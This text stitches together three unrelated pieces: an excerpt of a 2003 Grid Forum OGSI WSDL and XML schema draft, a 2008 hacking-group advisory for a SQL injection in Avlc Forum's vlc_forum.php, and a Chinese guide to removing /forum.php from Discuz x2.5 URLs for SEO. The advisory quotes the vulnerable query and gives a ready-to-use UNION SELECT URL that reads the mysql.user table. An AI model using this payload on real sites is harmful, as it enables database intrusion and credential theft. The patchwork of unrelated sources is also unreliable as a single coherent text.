一 : GLOBAL GRID FORUM
<fault name="ExtensibilityNotSupportedFault"
message="ogsi:ExtensibilityNotSupportedFaultMessage"/> <fault name="ExtensibilityTypeFault"
message="ogsi:ExtensibilityTypeFaultMessage"/>
<fault name="ServiceAlreadyExistsFault"
message="ogsi:ServiceAlreadyExistsFaultMessage"/>
<fault name="Fault" message="ogsi:FaultMessage"/>
</operation>
<sd:serviceData name="createServiceExtensibility"
type="ogsi:CreateServiceExtensibilityType"
minOccurs="1"
maxOccurs="unbounded"
mutability="static"
modifiable="false"
nillable="false"/>
</gwsdl:portType>
<!-- NotificationSource PortType -->
<gwsdl:portType name="NotificationSource" extends="ogsi:GridService"> <operation name="subscribe">
<input message="ogsi:SubscribeInputMessage"/>
<output message="ogsi:SubscribeOutputMessage"/>
<fault name="ExtensibilityNotSupportedFault"
message="ogsi:ExtensibilityNotSupportedFaultMessage"/> <fault name="ExtensibilityTypeFault"
message="ogsi:ExtensibilityTypeFaultMessage"/>
<fault name="TargetInvalidFault"
message="ogsi:TargetInvalidFaultMessage"/>
<fault name="Fault" message="ogsi:FaultMessage"/>
</operation>
<sd:serviceData name="notifiableServiceDataName"
type="xsd:QName"
minOccurs="0"
maxOccurs="unbounded"
mutability="mutable"
modifiable="false"
nillable="false"/>
<sd:serviceData name="subscribeExtensibility"
type="ogsi:OperationExtensibilityType"
minOccurs="1"
maxOccurs="unbounded"
mutability="static"
modifiability="false"
nillable="false"/>
<sd:staticServiceDataValues>
<ogsi:subscribeExtensibility
inputElement="ogsi:subscribeByServiceDataNames"/>
</sd:staticServiceDataValues>
</gwsdl:portType>
<!-- Notification Sink PortType -->
<gwsdl:portType name="NotificationSink">
<operation name="deliverNotification">
<input message="ogsi:DeliverNotificationInputMessage"/>
</operation>
</gwsdl:portType>
ogsi-wg@ggf.org
82
gridservice GLOBAL GRID FORUM
GWD-R (draft-ggf-ogsi-gridservice-33) June 27, 2003
<!-- NotificationSubscription PortType -->
<gwsdl:portType name="NotificationSubscription"
extends="ogsi:GridService">
<sd:serviceData name="subscriptionExpression"
type="xsd:anyType"
minOccurs="1"
maxOccurs="1"
mutability="mutable"
modifiable="false"
nillable="false"/>
<sd:serviceData name="sinkLocator"
type="ogsi:LocatorType"
minOccurs="1"
maxOccurs="1"
mutability="mutable"
modifiable="false"
nillable="false"/>
</gwsdl:portType>
<!-- ServiceGroupEntry PortType -->
<gwsdl:portType name="ServiceGroupEntry" extends="ogsi:GridService"> <sd:serviceData name="memberServiceLocator"
type="ogsi:LocatorType"
minOccurs="1"
maxOccurs="1"
mutability="mutable"
modifiable="false"
nillable="false"/>
<sd:serviceData name="content"
type="ogsi:EntryContentType"
minOccurs="1"
maxOccurs="1"
mutability="mutable"
modifiable="false"
nillable="false"/>
</gwsdl:portType>
<!-- ServiceGroup PortType -->
<gwsdl:portType name="ServiceGroup" extends="ogsi:GridService"> <sd:serviceData name="membershipContentRule"
type="ogsi:MembershipContentRuleType"
minOccurs="1"
maxOccurs="unbounded"
mutability="constant"
modifiable="false"
nillable="false"/>
<sd:serviceData name="entry"
type="ogsi:EntryType"
minOccurs="0"
maxOccurs="unbounded"
mutability="mutable"
modifiable="false"
nillable="false"/>
</gwsdl:portType>
<!-- ServiceGroupRegistration PortType -->
ogsi-wg@ggf.org
83
gridservice GLOBAL GRID FORUM
GWD-R (draft-ggf-ogsi-gridservice-33) June 27, 2003 <gwsdl:portType name="ServiceGroupRegistration"
extends="ogsi:ServiceGroup">
<operation name="add">
<input message="ogsi:AddInputMessage"/> <output message="ogsi:AddOutputMessage"/>
<fault name="ExtensibilityNotSupportedFault"
message="ogsi:ExtensibilityNotSupportedFaultMessage"/> <fault name="ExtensibilityTypeFault"
message="ogsi:ExtensibilityTypeFaultMessage"/>
<fault name="ContentCreationFailedFault"
message="ogsi:ContentCreationFailedFaultMessage"/>
<fault name="UnsupportedMemberInterfaceFault"
message="ogsi:UnsupportedMemberInterfaceFaultMessage"/> <fault name="AddRefusedFault"
message="ogsi:AddRefusedFaultMessage"/>
<fault name="Fault" message="ogsi:FaultMessage"/>
</operation>
<operation name="remove">
<input message="ogsi:removeInputMessage"/>
<output message="ogsi:removeOutputMessage"/>
<fault name="ExtensibilityNotSupportedFault"
message="ogsi:ExtensibilityNotSupportedFaultMessage"/> <fault name="ExtensibilityTypeFault"
message="ogsi:ExtensibilityTypeFaultMessage"/>
<fault name="MatchFailedFault"
message="ogsi:MatchFailedFaultMessage"/>
<fault name="RemoveFailedFault"
message="ogsi:RemoveFailedFaultMessage"/>
<fault name="Fault" message="ogsi:FaultMessage"/>
</operation>
<sd:serviceData name="addExtensibility"
type="ogsi:OperationExtensibilityType"
minOccurs="0"
maxOccurs="unbounded"
mutability="static"
modifiable="false"
nillable="false"/>
<sd:serviceData name="removeExtensibility"
type="ogsi:OperationExtensibilityType"
minOccurs="1"
maxOccurs="unbounded"
mutability="static"
modifiable="false"
nillable="false"/>
<sd:staticServiceDataValues>
<ogsi:removeExtensibility
inputElement="ogsi:matchByLocatorEquivalence"/>
</sd:staticServiceDataValues>
</gwsdl:portType>
</definitions>
19.2 http://www.gridforum.org/namespaces/2003/03/serviceData
<?xml version="1.0" encoding="UTF-8"?>
<schema
targetNamespace="http://www.gridforum.org/namespaces/2003/03/serviceDatogsi-wg@ggf.org
84
gridservice GLOBAL GRID FORUM
GWD-R (draft-ggf-ogsi-gridservice-33) June 27, 2003 a"
xmlns:sd="http://www.gridforum.org/namespaces/2003/03/serviceData" xmlns="http://www.w3.org/2001/XMLSchema"
elementFormDefault="qualified"
attributeFormDefault="unqualified">
<attributeGroup name="occurs">
<attribute name="minOccurs"
type="nonNegativeInteger"
use="optional"
default="1"/>
<attribute name="maxOccurs">
<simpleType>
<union memberTypes="nonNegativeInteger">
<simpleType>
<restriction base="NMTOKEN">
<enumeration value="unbounded"/>
</restriction>
</simpleType>
</union>
</simpleType>
</attribute>
</attributeGroup>
<complexType name="ServiceDataType">
<sequence>
<any namespace="##any" minOccurs="0" maxOccurs="unbounded"/> </sequence>
<attribute name="name" type="NCName"/>
<attribute name="type" type="QName"/>
<attribute name="nillable"
type="boolean"
use="optional"
default="false"/>
<attributeGroup ref="sd:occurs"/>
<attribute name="mutability" use="optional" default="extendable"> <simpleType>
<restriction base="string">
<enumeration value="static"/>
<enumeration value="constant"/>
<enumeration value="extendable"/>
<enumeration value="mutable"/>
</restriction>
</simpleType>
</attribute>
<attribute name="modifiable" type="boolean" default="false"/> <anyAttribute namespace="##other" processContents="lax"/>
</complexType>
<element name="serviceData" type="sd:ServiceDataType"/>
<complexType name="ServiceDataValuesType">
<sequence>
<any namespace="##any" minOccurs="0" maxOccurs="unbounded" /> </sequence>
</complexType>
ogsi-wg@ggf.org
85
gridservice GLOBAL GRID FORUM
GWD-R (draft-ggf-ogsi-gridservice-33) June 27, 2003 <element name="serviceDataValues" type="sd:ServiceDataValuesType"/> <element name="staticServiceDataValues"
type="sd:ServiceDataValuesType"/>
</schema>
19.3 http://www.gridforum.org/namespaces/2003/03/gridWSDLExtensions <?xml version="1.0" encoding="UTF-8"?>
<schema
targetNamespace="http://www.gridforum.org/namespaces/2003/03/gridWSDLExtensions"
xmlns:gwsdl="http://www.gridforum.org/namespaces/2003/03/gridWSDLExtensions"
xmlns="http://www.w3.org/2001/XMLSchema"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" elementFormDefault="qualified">
<import namespace="http://schemas.xmlsoap.org/wsdl/"/>
<element name="portType" type="gwsdl:PortTypeType"/>
<complexType name="PortTypeType">
<complexContent>
<extension base="wsdl:portTypeType">
<sequence>
<any namespace="##other" minOccurs="0"
maxOccurs="unbounded"/>
</sequence>
<attribute name="extends" use="optional">
<simpleType>
<list itemType="QName"/>
</simpleType>
</attribute>
<anyAttribute namespace="##other"/>
</extension>
</complexContent>
</complexType>
</schema>
ogsi-wg@ggf.org
86
二 : Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
====================================================================Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
====================================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
` ---------------------------^----------|
`_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / ` /
/ XXXXXX /______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 12 July 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : Avlc Forum
VERSION : N/A
VENDOR : N/A
DOWNLOAD : http://www.easy-script.com/compt.php?id=2147
#####################################################
-- Remote SQL Injection ---
---------------------------------
Vulnerable File [vlc_forum.php]
---------------------------------
@Line
141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());
-------------
POC Exploit
-------------
[ ] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--
#####################################################################
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
三 : Dsicuz x2.5去掉域名后面的/forum.php
Dsicuz x2.5论坛一般开始新建立站点都会形成这样后缀,但是我们知道这样是不利于去做SEO优化,今天给大家分享两个去除的方式。可以去掉域名后面的/forum.php或portal.php后缀,可实现SEO优化中的URL标准化.登陆后台步骤操作方式:
登陆Dsicuz x2.5论坛后台。全局--域名设置--应用域名--设置默认域名为访问域名
1、在默认处 填写上你的域名如??abc.com(主域名)??或者是(二级域名)? ?123.abc.com ?注意:不要加http:// 和 "/"
2、在界面 --导航设置 -- 主导航 ?(添加一个新导航??链接处填写 /)
保存即可去掉。
forum.php或portal.php文件设置形式
去掉面包屑导航中的forum.php或portal.php的方法分别打开三个程序文件
1.打开模版文件discuz.htm,查找以下代码
2.打开模版文件forumdisplay.htm,查找以下代码
3.打开模版文件viewthread.htm,查找以下代码
以上3个文件中查找的代码中把<a href=”forum.php”>替换成<a href=”./”>即可。设置默认首页也可以去掉/forum.php
重新添加导航,然后添加地址,设置启用,把原来的不启用,默认首页选择不动。或者你可以重新添加导航,然后添加地址,设置启用,设置默认首页,把原来的不启用,然后论坛做首页把forum.php添加为默认首页,门户做首页把portal.php添加为默认首页即可。
注意:第二种方式是最新更新的上面的方法比较复杂,自己在实践中总结了更简单的修改后缀的方法,分享给大家。